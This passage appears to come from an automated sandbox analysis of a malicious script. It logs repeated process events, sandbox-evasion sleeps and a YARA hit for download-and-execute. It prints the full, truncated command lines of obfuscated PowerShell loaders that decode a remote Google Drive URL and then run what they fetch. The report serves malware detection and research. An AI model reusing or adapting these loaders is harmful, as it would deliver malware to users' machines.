            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5197Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4729Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5813Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4031Jump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 7668Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4200Thread sleep count: 5813 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4452Thread sleep count: 4031 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2112Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000003.1392277797.0000023822D68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1391500820.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392029985.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396822089.0000023822D65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392096367.0000023822D41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396594042.0000023822DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.1391500820.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392029985.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396594042.0000023822DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~*
            Source: powershell.exe, 00000009.00000002.2715037329.00000247FBF02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_1296.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1296, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,niJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility';if (${host}.currentculture) {$reinvigorate++;}function reeling($takkende){$mjavende=$takkende.length-$reinvigorate;$neocortical='substri';$neocortical+='ng';for( $kngtende=2;$kngtende -lt $mjavende;$kngtende+=3){$aflytningsudstyrene+=$takkende.$neocortical.invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function convictively($mispainted){ . ($aabningstid) ($mispainted);}$lignings=reeling ' ,mhwo,ozscicolp,lkiaov/sh5f..ta0en f(sew ainontcdciob,wh,ste fln ktsk fi1.y0fo.c 0ly;u. ,wstispn l6be4ei; , .kx u6 ,4,i;in lorinvun: a1ac2ag1f .be0,i)af ,og aesickakdeo s/sk2ir0ny1ol0ou0op1fl0sa1k, defreireryderafeso,axop/ u1 s2 ,1sk.be0m, ';$triatomicity=reeling 'inup s,ue srca-noaoeg iefinvat a ';$undgldes=reeling ' fh at,etcep ks p:in/dr/sed,lrt,io.vsuech. vgvao ,opegbalcaee .lecfros,m.a/m.u ecse?b,e,hx npdioa,r.atln=podwaor.ws,ngol gos a.rd t&f,isjdst= p1anx swobi.ar rdiel,g ytafx .8ude ,qpuutii.semazwhqse- fqt.rla9prkstkmehre3prqmuyaf6 ,a digos.gxsu ';$alytes=reeling ' g>p. ';$aabningstid=reeling ',ris.e axes ';$proboscidiferous='betoningerne';$friluftsmenneskerne = reeling ' uenyci.h,ro . p%una mpgop.nd.oa,rtomad.%za\agnsporenzic,hos nhaga,egesdrta,im ob.nha.a fraorer.e la&ta&se baeinca.hunopr sntns ';convictively (reeling 'di$tigfoltuowab ea olha:,lf u vs hesttta=a ( ccsumtrdps ho/encf. u$ rf .r .i ,leuu uf vtstsspmdee fnsunfaearsrokovegyrfan ,e .) ');convictively (reeling 're$.egb l iob.bplapil s: r,oi mvenin nini .afanfo=sp$aiucyn tdcag.pl rdreehysno.syscopirl .isyt .( $olaiml,hygrt ue es s) ');convictively (reeling 'd,[glnk.ekatsu.oxs sekerkov.oi.aco e fpheok i,onpet .mbaabln ,a gelebir u]bl:c.:sqsste.eck.ubarn,ipit y bpner eo ftf ozycpuo tl.n r =dr ca[dintrekrtdy.u,smeerecsuufrru iint iyscpb rexo.st o pclaoqultrtalybopste l] v:tu:,ft mlm sb,1y 2 u ');$undgldes=$rivinian[0];$rengringsmidlets= (reeling 'pu$q,gbal ,olubp.an,lpi:meom,phags.rvea.ivgues.= ,n neryw .-,lo db bj menocaptde fss.yposudtc,egom.d.hvn seint o.g.wspe obh cm,laliwoe n at');$rengringsmidlets+=$fuset[1];convictively ($rengringsmidlets);convictively (reeling 'no$s,ob.pbagmor.aaf vboe x.,ehsketrakddtae .ra,s s[be$got,arm,ibiaknt ko sm ritic.ri ft yde]l.=f.$ blafipogarnf,i anelgovsfo ');$promachos=reeling ' s$oso ,p ggcoru,agsvskek,.frdino ,wprnb,lofo rakadgaf,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility';if (${host}.currentculture) {$reinvigorate++;}function reeling($takkende){$mjavende=$takkende.length-$reinvigorate;$neocortical='substri';$neocortical+='ng';for( $kngtende=2;$kngtende -lt $mjavende;$kngtende+=3){$aflytningsudstyrene+=$takkende.$neocortical.invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function convictively($mispainted){ . ($aabningstid) ($mispainted);}$lignings=reeling ' ,mhwo,ozscicolp,lkiaov/sh5f..ta0en f(sew ainontcdciob,wh,ste fln ktsk fi1.y0fo.c 0ly;u. ,wstispn l6be4ei; , .kx u6 ,4,i;in lorinvun: a1ac2ag1f .be0,i)af ,og aesickakdeo s/sk2ir0ny1ol0ou0op1fl0sa1k, defreireryderafeso,axop/ u1 s2 ,1sk.be0m, ';$triatomicity=reeling 'inup s,ue srca-noaoeg iefinvat a ';$undgldes=reeling ' fh at,etcep ks p:in/dr/sed,lrt,io.vsuech. vgvao ,opegbalcaee .lecfros,m.a/m.u ecse?b,e,hx npdioa,r.atln=podwaor.ws,ngol gos a.rd t&f,isjdst= p1anx swobi.ar rdiel,g ytafx .8ude ,qpuutii.semazwhqse- fqt.rla9prkstkmehre3prqmuyaf6 ,a digos.gxsu ';$alytes=reeling ' g>p. ';$aabningstid=reeling ',ris.e axes ';$proboscidiferous='betoningerne';$friluftsmenneskerne = reeling ' uenyci.h,ro . p%una mpgop.nd.oa,rtomad.%za\agnsporenzic,hos nhaga,egesdrta,im ob.nha.a fraorer.e la&ta&se baeinca.hunopr sntns ';convictively (reeling 'di$tigfoltuowab ea olha:,lf u vs hesttta=a ( ccsumtrdps ho/encf. u$ rf .r .i ,leuu uf vtstsspmdee fnsunfaearsrokovegyrfan ,e .) ');convictively (reeling 're$.egb l iob.bplapil s: r,oi mvenin nini .afanfo=sp$aiucyn tdcag.pl rdreehysno.syscopirl .isyt .( $olaiml,hygrt ue es s) ');convictively (reeling 'd,[glnk.ekatsu.oxs sekerkov.oi.aco e fpheok i,onpet .mbaabln ,a gelebir u]bl:c.:sqsste.eck.ubarn,ipit y bpner eo ftf ozycpuo tl.n r =dr ca[dintrekrtdy.u,smeerecsuufrru iint iyscpb rexo.st o pclaoqultrtalybopste l] v:tu:,ft mlm sb,1y 2 u ');$undgldes=$rivinian[0];$rengringsmidlets= (reeling 'pu$q,gbal ,olubp.an,lpi:meom,phags.rvea.ivgues.= ,n neryw .-,lo db bj menocaptde fss.yposudtc,egom.d.hvn seint 